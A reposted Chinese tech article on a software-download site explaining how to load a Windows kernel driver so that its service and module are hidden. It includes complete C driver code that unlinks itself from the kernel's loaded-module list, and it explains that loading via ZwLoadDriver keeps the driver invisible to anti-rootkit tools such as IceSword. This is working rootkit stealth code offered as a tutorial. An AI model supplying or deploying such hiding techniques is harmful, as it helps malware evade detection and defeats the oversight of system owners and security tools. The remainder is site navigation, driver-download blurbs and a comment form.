西西软件园多重安全检测下载网站、值得信赖的软件下载站!
软件
软件
文章
搜索

首页编程开发其它知识 → 驱动的加载、隐藏模块和服务

驱动的加载、隐藏模块和服务

相关软件相关文章发表评论 来源:3600safe时间:2012/2/23 15:01:31字体大小:A-A+

作者:3600safe点击:127次评论:6次标签: 驱动

  • 类型:U 盘工具大小:601KB语言:中文 评分:8.2
  • 标签:
立即下载

1隐藏服务
驱动的加载一般有三种方式:
OpenSCManager
ZwLoadDriver
ZwSetSystemInformation
这里我们用ZwLoadDriver来加载驱动程序.便可以隐藏服务了,没试其他,冰刃和WSysCheck就看不到我们的服务了

2隐藏模块
摘链,注意加载驱动用ZwLoadDriver不要用OpenSCManager,否则如下图一样:

驱动代码比较简单

01 #include "ntddk.h"
02 typedef unsigned long DWORD;
03 typedef DWORD* PDWORD;
04 typedef struct _DRIVER_DATA
05 {
06 LIST_ENTRY listEntry;
07 DWORD unknown1;
08 DWORD unknown2;
09 DWORD unknown3;
10 DWORD unknown4;
11 DWORD unknown5;
12 DWORD unknown6;
13 DWORD unknown7;
14 UNICODE_STRING path;
15 UNICODE_STRING name;
16 } DRIVER_DATA;
17 VOID OnUnload( IN PDRIVER_OBJECT pDriverObject )
18 {
19 DbgPrint("OnUnload called.");
20 }
21 NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING theRegistryPath )
22 {
23
24 DRIVER_DATA* driverData;
25 driverData = *((DRIVER_DATA**)((DWORD)pDriverObject + 20));
26 if( driverData != NULL )
27 {
28 *((PDWORD)driverData->listEntry.Blink) = (DWORD)driverData->listEntry.Flink;
29 driverData->listEntry.Flink->Blink = driverData->listEntry.Blink;
30 DbgPrint("Sucessfull.\n");
31 }
32 pDriverObject->DriverUnload = OnUnload;
33 return STATUS_SUCCESS;
34 }

加载驱动后,我们用DbgView看到打出的Sucessfull就知道我们的驱动已经运行了...然后用冰刃的查看模块,服务..好像没什么动静...he8he8
下面的图是用OpenSCManager加载驱动的效果....所以不要用OpenSCManager加载,用ZwLoadDriver加载,这样冰刃才查不出来

    usb驱动
    (15)usb驱动
    接口作为电脑很重要的一个端口没有驱动的话是没法工作的,特别是笔记本电脑外接键盘鼠标都需要用到接口,不过有时候我们会遇到主板的驱动程序光盘中没有提供驱动,这时候我们就需要根据自己的型号找到对应的驱动程序。当然我们可以下载万能驱动,可以支持大部分的设备。西西为大家收集了一些设备的驱动程序,大家可以根据自己的需要下载。...更多>>
    万能显卡
    (240)万能显卡
    万能显卡驱动适用于所有显卡安装驱动所用,称之为万能显卡驱动。显卡驱动是硬件所对应的软件,你装电脑时那帮你装电脑的人不是给了你很多碟子的吗,那些就是驱动程序,其中必然有一张是显卡的驱动程序。先要确定你的显卡什么牌子型号的,如果记不得了,就打开机箱看那个竖插在主板上的较大板子一般显卡有很大的散热片或风扇上的型号品牌。如果是集成的显卡在主板上看不到前面说的那样的电路板,就看主板上的型号品牌,记下来。但是...更多>>

    相关评论

    阅读本文后您有什么感想? 已有人给出评价!

    • 8 喜欢喜欢
    • 3 顶
    • 1 难过难过
    • 5 囧
    • 3 围观围观
    • 2 无聊无聊

    热门评论

    最新评论

    发表评论 查看所有评论(6)

    昵称:
    表情: 高兴 可 汗 我不要 害羞 好 下下下 送花 屎 亲亲
    字数: 0/500 (您的评论需要经过审核才能显示)